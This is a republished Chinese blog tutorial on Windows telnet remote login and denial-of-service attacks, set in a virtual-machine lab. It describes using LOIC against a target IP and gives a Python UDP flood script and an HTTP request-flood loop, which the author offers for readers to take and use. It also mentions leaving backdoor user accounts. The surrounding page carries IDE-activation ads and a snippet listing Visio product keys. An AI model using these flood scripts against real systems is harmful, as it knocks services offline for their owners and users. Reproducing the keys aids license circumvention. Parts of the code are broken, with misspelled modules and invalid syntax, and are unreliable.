网络攻防:telnet远程登录和拒绝服务攻击的实现(dos攻击)

网络攻防:telnet远程登录和拒绝服务攻击的实现(dos攻击)首先先说下我写这些文章的目的.我的专业就是网络安全,因此,也愿意把自己所学的一些东西都分享出来.不过由于涉及到很多黑客的东西,一些软件我就不发了,脚本什么的你们可以拿去用.更多的是为了给大家普及一下管于黑客的知识,以及如何防范黑客.这是我写的第一篇文章,希望能给你们带来一些启发.实验环境:三台虚拟机,win7,win7,win2003,并且要关掉所有的防火墙一.telnet远程登录1.实验环境搭建实验环境:攻击机win7,靶机win2003telnet是windows里面的一个服务.基本w.

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

首先先说下我写这些文章的目的.我的专业就是网络安全,因此,也愿意把自己所学的一些东西都分享出来.不过由于涉及到很多黑客的东西,一些软件我就不发了,脚本什么的你们可以拿去用.
更多的是为了给大家普及一下管于黑客的知识,以及如何防范黑客.这是我写的第一篇文章,希望能给你们带来一些启发.

实验环境:三台虚拟机,win7,win7,win2003,并且要关掉所有的防火墙

一.telnet远程登录

1.实验环境搭建

实验环境:攻击机win7,靶机win2003

telnet是windows里面的一个服务.基本windos都会自带这个服务,但是需要进行开启才可以.这个命令就类似于将对方的cmd复制到本地,攻击机输入的任何命令靶机都会执行.
有多厉害,就不需要我来说了吧.

这个命令需要攻击机和靶机都开启telnet命令才可以,不然就会出现下面这种情况:
在这里插入图片描述
会显示不是内部命令.因此需要开启这个服务.如图,我使用的攻击机是win7,开启的方法如下:
控制面板->程序和功能->打开或关闭windows功能->telnet服务器,telnet客户端都选择
在这里插入图片描述
我的靶机是win2003,开启的方法类似,在这里就不赘述了.这一步是必须要做的,不然在后面的连接会出现端口23未开启的问题.开启后的效果如图,记得一定要点击启动.
在这里插入图片描述

2.验证服务是否开启成功

在你的攻击机上面输入命令:

telnet /help

这时候会提示:
在这里插入图片描述
此时,你的telnet服务就开启成功了,可以进行下一步操作.

3.开始使用telnet进行远程连接

在开启win2003后,win7中首先输入第一条命令:

ping ip

此处的IP填写你靶机(win2003)的IP

如果发现可以ping通,进行下一步,如果发现ping不通,就说明网络的问题,解决了在进行下一步.
依次输入命令:

telnet 靶机ip

接着会提示一个是否确认的字符,输入y.
在输入你靶机的用户名和密码,如果按着步骤来的话,会出现下面的界面:
在这里插入图片描述
很好,此时你已经连接上你的靶机了,接下来你就可以使用命令来为所欲为了,比如创建用户,就是俗称的留后门,以及各种各样的操作.当然,步骤比较简单,是因为我们把自己的电脑的防护都降低到了最低.而真正的黑客会提前往你电脑里执行个脚本,将所有的防护自动关闭.想学的童鞋可以给个关注,以后我会写.

二.dos攻击

dos攻击虽然听着很厉害,但如果理解了以后就发现其实也就是那么回事.
dos攻击又称拒绝服务攻击,实现的方法有很多,这篇文章里面就写了三种实现方式.前面我会介绍用软件实现dos攻击,后面我会上代码来实现这种攻击.
软甲我就不发了,违法行为咱也不敢干,相信你们也不想见到我被封号

1.软件实现

比较出名的软件有”低轨道离子加农炮”.上截图:
在这里插入图片描述

上面打红线的地方是输入你靶机的IP,然后点击lock on.下面有配置选项,记得把端口改成你靶机开放的端口,不然攻击是没有效果的.点击右边2.READY里面的那个按钮,攻击就开始了.
效果我就不演示了,我当时换成udp模式以后靶机直接死机.用wireshark抓包以后,全都是arp的包.

二.代码实现

1.udp泛洪攻击

这个原理就是发送大量的udp无用包,最后使服务器无法进行响应而死机.直接上代码:

from socket import *
import random

st = socket(AF_INET, SOCK_DGRAM)
bytes = '123'
ip =''
port = 1
sent = 0

print("UDP flood attack is about to begin...")

while True:
    st.sendto(bytes, (ip, port))
    sent += 1
    port += 1
    print("Sent %s packet to %s throught port:%s" % (sent, ip, port))
    if port == 65534:
        port = 1

这个是python的代码.用的时候记得把ip填上.当执行以后,会循环向每个端口建立连接请求,最后堵死每个端口.但是由于仅仅使用的是单线程,因此效果没有太明显.下面的图是脚本运行以后的截图,可以发现都不需要过滤都能抓到一堆arp包.
在这里插入图片描述

2.cc攻击

准确上来说,下面这段代码并不是cc攻击,而是利用爬虫的requests模块进行对网站的访问.当访问量足够大的时候,就会使服务器崩溃.因此我将其分类为cc攻击.

import reqests
ip=""
while 1=1
	requests.get("http://"+ip)

使用时记得加上靶机的ip.这个代码也是单线程的,可以用线程模块写成多线程的.
下面是抓包的结果.
在这里插入图片描述
如图,抓到的包都是tcp响应包.可以证明程序运行成功,不过由于量不够大,仍然无法使服务器崩溃.

写个总结吧.这次我只写了两个内容,telnet命令的使用,以及dos攻击的一些手段,内容比较简单,不过仍然需要好好看看.

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/188389.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • 转载——visio密钥[通俗易懂]

    转载——visio密钥[通俗易懂]转自:https://blog.csdn.net/yangmingsen1999/article/details/84934620GR24B-GC2XY-KRXRG-2TRJJ-4X7DCVWQ6G-37WBG-J7DJP-CY66Y-V278X2T8H8-JPW3D-CJGRK-3HTVF-VWD83HMCVF-BX8YB-JK46P-DP3KJ-9DRB222WT8-GGT7M-7M…

  • NE问题分析

    一.crash(NE)问题1.找到堆栈信息一般堆栈在Androidlog或者tombstore里面,androidlog里面直接搜libsurfaceflinger或者surfaceflinger定位到log,SW-WDtombstore文件是系统在系统发生NE是抓到的堆栈信息,可能会包含多份文件,找的需要的即可2.解析堆栈backtrace信息,主要看调用栈,我们能从中得到发生问题的具体代码行号,比如:#01pc00000000000642fc/apex/com.android

  • java 字符数组 合并_字符数组合并?c数组合并?java数组合并问题「建议收藏」

    java 字符数组 合并_字符数组合并?c数组合并?java数组合并问题「建议收藏」本文关键词数组合并,由教案网整理发布publicstaticString[]getOneArray(){String[]a={“0″,”1″,”2”};String[]b={“0″,”1″,”2”};String[]c=newString[a.length+b.length];for(intj=0;j<a.length;++j)…

  • BusyBox下载安装教程

    BusyBox下载安装教程文章目录BusyBox下载安装教程简介下载压缩包开始安装BusyBox下载安装教程简介BusyBox是一个集成了三百多个最常用Linux命令和工具的软件。BusyBox包含了一些简单的工具,例如ls、cat和echo等等,还包含了一些更大、更复杂的工具,例grep、find、mount以及telnet。有些人将BusyBox称为Linux工具里的瑞士军刀。简单的说BusyBox就好像是个大工具箱,它集成压缩了Linux的许多工具和命令,也包含了Linux系统的自带的shell。B

  • 如何搭建谷歌离线地图服务[通俗易懂]

    如何搭建谷歌离线地图服务[通俗易懂]如何发布google离线地图及二次开发API发布时间:2018-01-17版权:相关教程:一键离线地图发布(工具下载)使用教程谷歌离线地图API接口文档及接口调用实例1.说明离线地图开发环境支持谷歌地图、百度地图、高德地图等等所有常用地图类型,支持在局域网内的地图部署、二次开发。2.实现第一步:下载安装离线地图开发环境BIEGMAP离线地图服务器…

  • scala swing

    scala swing

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号